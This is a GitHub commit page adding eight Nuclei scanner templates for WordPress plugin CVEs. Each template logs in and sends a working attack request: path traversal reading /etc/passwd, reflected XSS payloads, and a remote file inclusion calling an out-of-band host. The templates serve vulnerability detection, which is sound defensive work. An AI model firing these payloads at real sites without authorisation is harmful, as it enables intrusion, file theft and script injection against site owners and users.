forked from projectdiscovery/nuclei-templates
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Merge pull request projectdiscovery#3683 from cckuailong/master
add some wp plugins cves
- Loading branch information
Showing
8 changed files
with
349 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,40 @@ | ||
| id: CVE-2020-35749 | ||
|
|
||
| info: | ||
| name: Simple Job Board < 2.9.4 - Authenticated Path Traversal Leading to Arbitrary File Download | ||
| author: cckuailong | ||
| severity: high | ||
| description: The plugin does not validate the sjb_file parameter when viewing a resume, allowing authenticated user with the download_resume capability (such as HR users) to download arbitrary files from the web-server via a path traversal attack. | ||
| reference: | ||
| - https://wpscan.com/vulnerability/eed3bd69-2faf-4bc9-915c-c36211ef9e2d | ||
| - https://nvd.nist.gov/vuln/detail/CVE-2020-35749 | ||
| classification: | ||
| cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N | ||
| cvss-score: 7.7 | ||
| cve-id: CVE-2020-35749 | ||
| cwe-id: CWE-22 | ||
| tags: cve,cve2020,lfi,wp,wordpress,wp-plugin,authenticated | ||
|
|
||
| requests: | ||
| - raw: | ||
| - | | ||
| POST /wp-login.php HTTP/1.1 | ||
| Host: {{Hostname}} | ||
| Origin: {{RootURL}} | ||
| Content-Type: application/x-www-form-urlencoded | ||
| Cookie: wordpress_test_cookie=WP%20Cookie%20check | ||
| log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 | ||
| - | | ||
| GET /wp-admin/post.php?post=372&action=edit&sjb_file=../../../../etc/passwd HTTP/1.1 | ||
| Host: {{Hostname}} | ||
| cookie-reuse: true | ||
| matchers-condition: and | ||
| matchers: | ||
| - type: regex | ||
| regex: | ||
| - "root:[x*]:0:0" | ||
|
|
||
| - type: status | ||
| status: | ||
| - 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,49 @@ | ||
| id: CVE-2021-24300 | ||
|
|
||
| info: | ||
| name: PickPlugins Product Slider for WooCommerce < 1.13.22 - XSS | ||
| author: cckuailong | ||
| severity: medium | ||
| description: The slider import search feature of the PickPlugins Product Slider for WooCommerce WordPress plugin before 1.13.22 did not properly sanitised the keyword GET parameter, leading to reflected Cross-Site Scripting issue. | ||
| reference: | ||
| - https://wpscan.com/vulnerability/5fbbc7ad-3f1a-48a1-b2eb-e57f153eb837 | ||
| - https://nvd.nist.gov/vuln/detail/CVE-2021-24300 | ||
| classification: | ||
| cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N | ||
| cvss-score: 6.1 | ||
| cve-id: CVE-2021-24300 | ||
| cwe-id: CWE-79 | ||
| tags: cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated | ||
|
|
||
| requests: | ||
| - raw: | ||
| - | | ||
| POST /wp-login.php HTTP/1.1 | ||
| Host: {{Hostname}} | ||
| Origin: {{RootURL}} | ||
| Content-Type: application/x-www-form-urlencoded | ||
| Cookie: wordpress_test_cookie=WP%20Cookie%20check | ||
| log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 | ||
| - | | ||
| GET /wp-admin/edit.php?post_type=wcps&page=import_layouts&keyword="onmouseover%3Dalert%28document.domain%29%3B%2F%2F HTTP/1.1 | ||
| Host: {{Hostname}} | ||
| cookie-reuse: true | ||
| matchers-condition: and | ||
| matchers: | ||
| - type: word | ||
| part: body | ||
| words: | ||
| - 'value="\"onmouseover=alert(document.domain);//">' | ||
| - "PickPlugins Product Slider" | ||
| condition: and | ||
|
|
||
| - type: word | ||
| part: header | ||
| words: | ||
| - text/html | ||
|
|
||
| - type: status | ||
| status: | ||
| - 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,45 @@ | ||
| id: CVE-2021-24488 | ||
|
|
||
| info: | ||
| name: WordPress Plugin Post Grid < 2.1.8 - XSS | ||
| author: cckuailong | ||
| severity: medium | ||
| description: The slider import search feature and tab parameter of the Post Grid WordPress plugin before 2.1.8 settings are not properly sanitised before being output back in the pages, leading to Reflected Cross-Site Scripting issues | ||
| reference: | ||
| - https://wpscan.com/vulnerability/1fc0aace-ba85-4939-9007-d150960add4a | ||
| - https://nvd.nist.gov/vuln/detail/CVE-2021-24488 | ||
| classification: | ||
| cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N | ||
| cvss-score: 6.1 | ||
| cve-id: CVE-2021-24488 | ||
| cwe-id: CWE-79 | ||
| tags: cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated | ||
|
|
||
| requests: | ||
| - raw: | ||
| - | | ||
| POST /wp-login.php HTTP/1.1 | ||
| Host: {{Hostname}} | ||
| Origin: {{RootURL}} | ||
| Content-Type: application/x-www-form-urlencoded | ||
| Cookie: wordpress_test_cookie=WP%20Cookie%20check | ||
| log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 | ||
| - | | ||
| GET /wp-admin/edit.php?post_type=post_grid&page=import_layouts&keyword="onmouseover=alert(document.domain)// HTTP/1.1 | ||
| Host: {{Hostname}} | ||
| cookie-reuse: true | ||
| matchers-condition: and | ||
| matchers: | ||
| - type: word | ||
| part: body | ||
| words: | ||
| - 'value="\"onmouseover=alert(document.domain)/">' | ||
| - 'Post Grid' | ||
| condition: and | ||
|
|
||
| - type: status | ||
| status: | ||
| - 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,43 @@ | ||
| id: CVE-2021-24926 | ||
|
|
||
| info: | ||
| name: WordPress Plugin Domain Check < 1.0.17 - XSS | ||
| author: cckuailong | ||
| severity: medium | ||
| description: The Domain Check WordPress plugin before 1.0.17 does not sanitise and escape the domain parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting issue. | ||
| reference: | ||
| - https://wpscan.com/vulnerability/8cc7cbbd-f74f-4f30-9483-573641fea733 | ||
| - https://nvd.nist.gov/vuln/detail/CVE-2021-24926 | ||
| classification: | ||
| cve-id: CVE-2021-24926 | ||
| cwe-id: CWE-79 | ||
| tags: cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated | ||
|
|
||
| requests: | ||
| - raw: | ||
| - | | ||
| POST /wp-login.php HTTP/1.1 | ||
| Host: {{Hostname}} | ||
| Origin: {{RootURL}} | ||
| Content-Type: application/x-www-form-urlencoded | ||
| Cookie: wordpress_test_cookie=WP%20Cookie%20check | ||
| log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 | ||
| - | | ||
| GET /wp-admin/admin.php?page=domain-check-profile&domain=test.foo<script>alert(document.domain)</script> HTTP/1.1 | ||
| Host: {{Hostname}} | ||
| cookie-reuse: true | ||
| matchers-condition: and | ||
| matchers: | ||
| - type: word | ||
| part: body | ||
| words: | ||
| - "<script>alert(document.domain)</script>" | ||
| - "Domain Check" | ||
| condition: and | ||
|
|
||
| - type: status | ||
| status: | ||
| - 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,39 @@ | ||
| id: CVE-2021-24947 | ||
|
|
||
| info: | ||
| name: RVM - Responsive Vector Maps < 6.4.2 - Arbitrary File Read | ||
| author: cckuailong | ||
| severity: high | ||
| description: The plugin does not have proper authorisation, CSRF checks and validation of the rvm_upload_regions_file_path parameter in the rvm_import_regions AJAX action, allowing any authenticated user, such as subscriber, to read arbitrary files on the web server. | ||
| reference: | ||
| - https://wpscan.com/vulnerability/c6bb12b1-6961-40bd-9110-edfa9ee41a18 | ||
| - https://nvd.nist.gov/vuln/detail/CVE-2021-24947 | ||
| classification: | ||
| cve-id: CVE-2021-24947 | ||
| cwe-id: CWE-23 | ||
| tags: cve,cve2021,lfi,wp,wordpress,wp-plugin,authenticated,lfr | ||
|
|
||
| requests: | ||
| - raw: | ||
| - | | ||
| POST /wp-login.php HTTP/1.1 | ||
| Host: {{Hostname}} | ||
| Origin: {{RootURL}} | ||
| Content-Type: application/x-www-form-urlencoded | ||
| Cookie: wordpress_test_cookie=WP%20Cookie%20check | ||
| log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 | ||
| - | | ||
| GET /wp-admin/admin-ajax.php?action=rvm_import_regions&nonce=5&rvm_mbe_post_id=1&rvm_upload_regions_file_path=/etc/passwd HTTP/1.1 | ||
| Host: {{Hostname}} | ||
| cookie-reuse: true | ||
| matchers-condition: and | ||
| matchers: | ||
| - type: regex | ||
| regex: | ||
| - "root:[x*]:0:0" | ||
|
|
||
| - type: status | ||
| status: | ||
| - 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,45 @@ | ||
| id: CVE-2021-24991 | ||
|
|
||
| info: | ||
| name: The WooCommerce PDF Invoices & Packing Slips WordPress plugin < 2.10.5 - XSS | ||
| author: cckuailong | ||
| severity: medium | ||
| description: The WooCommerce PDF Invoices & Packing Slips WordPress plugin before 2.10.5 does not escape the tab and section parameters before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting in the admin dashboard. | ||
| reference: | ||
| - https://wpscan.com/vulnerability/88e706df-ae03-4665-94a3-db226e1f31a9 | ||
| - https://nvd.nist.gov/vuln/detail/CVE-2021-24991 | ||
| classification: | ||
| cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N | ||
| cvss-score: 4.8 | ||
| cve-id: CVE-2021-24991 | ||
| cwe-id: CWE-79 | ||
| tags: cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated | ||
|
|
||
| requests: | ||
| - raw: | ||
| - | | ||
| POST /wp-login.php HTTP/1.1 | ||
| Host: {{Hostname}} | ||
| Origin: {{RootURL}} | ||
| Content-Type: application/x-www-form-urlencoded | ||
| Cookie: wordpress_test_cookie=WP%20Cookie%20check | ||
| log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 | ||
| - | | ||
| GET /wp-admin/admin.php?page=wpo_wcpdf_options_page§ion=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29+x%3D HTTP/1.1 | ||
| Host: {{Hostname}} | ||
| cookie-reuse: true | ||
| matchers-condition: and | ||
| matchers: | ||
| - type: word | ||
| part: body | ||
| words: | ||
| - "\" style=animation-name:rotation onanimationstart=alert(document.domain) x" | ||
| - "WooCommerce PDF Invoices" | ||
| condition: and | ||
|
|
||
| - type: status | ||
| status: | ||
| - 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,44 @@ | ||
| id: CVE-2021-25008 | ||
|
|
||
| info: | ||
| name: The Code Snippets WordPress plugin < 2.14.3 - XSS | ||
| author: cckuailong | ||
| severity: medium | ||
| description: The Code Snippets WordPress plugin before 2.14.3 does not escape the snippets-safe-mode parameter before outputting it back in attributes, leading to a Reflected Cross-Site Scripting issue. | ||
| reference: | ||
| - https://wpscan.com/vulnerability/cb232354-f74d-48bb-b437-7bdddd1df42a | ||
| - https://nvd.nist.gov/vuln/detail/CVE-2021-25008 | ||
| classification: | ||
| cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N | ||
| cvss-score: 6.1 | ||
| cve-id: CVE-2021-25008 | ||
| cwe-id: CWE-79 | ||
| tags: cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated | ||
|
|
||
| requests: | ||
| - raw: | ||
| - | | ||
| POST /wp-login.php HTTP/1.1 | ||
| Host: {{Hostname}} | ||
| Origin: {{RootURL}} | ||
| Content-Type: application/x-www-form-urlencoded | ||
| Cookie: wordpress_test_cookie=WP%20Cookie%20check | ||
| log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 | ||
| - | | ||
| GET /wp-admin/admin.php?page=snippets&snippets-safe-mode%5B0%5D=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29+x%3D HTTP/1.1 | ||
| Host: {{Hostname}} | ||
| cookie-reuse: true | ||
| matchers-condition: and | ||
| matchers: | ||
| - type: word | ||
| part: body | ||
| words: | ||
| - "\" style=animation-name:rotation onanimationstart=alert(document.domain) x" | ||
| - "Snippets" | ||
| condition: and | ||
|
|
||
| - type: status | ||
| status: | ||
| - 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,44 @@ | ||
| id: CVE-2021-25052 | ||
|
|
||
| info: | ||
| name: The Button Generator WordPress plugin < 2.3.3 - RFI | ||
| author: cckuailong | ||
| severity: high | ||
| description: The Button Generator WordPress plugin before 2.3.3 within the wow-company admin menu page allows to include() arbitrary file with PHP extension (as well as with data:// or http:// protocols), thus leading to CSRF RCE. | ||
| reference: | ||
| - https://wpscan.com/vulnerability/a01844a0-0c43-4d96-b738-57fe5bfbd67a | ||
| - https://nvd.nist.gov/vuln/detail/CVE-2021-25052 | ||
| classification: | ||
| cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H | ||
| cvss-score: 8.8 | ||
| cve-id: CVE-2021-25052 | ||
| cwe-id: CWE-352 | ||
| tags: cve,cve2021,rfi,wp,wordpress,wp-plugin,authenticated | ||
|
|
||
| requests: | ||
| - raw: | ||
| - | | ||
| POST /wp-login.php HTTP/1.1 | ||
| Host: {{Hostname}} | ||
| Origin: {{RootURL}} | ||
| Content-Type: application/x-www-form-urlencoded | ||
| Cookie: wordpress_test_cookie=WP%20Cookie%20check | ||
| log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 | ||
| - | | ||
| GET /wp-admin/admin.php?page=wow-company&tab=http://{{interactsh-url}}/ HTTP/1.1 | ||
| Host: {{Hostname}} | ||
| cookie-reuse: true | ||
| matchers-condition: and | ||
| matchers: | ||
| - type: status | ||
| status: | ||
| - 200 | ||
|
|
||
| - type: word | ||
| part: interactsh_protocol | ||
| name: http | ||
| words: | ||
| - "http" |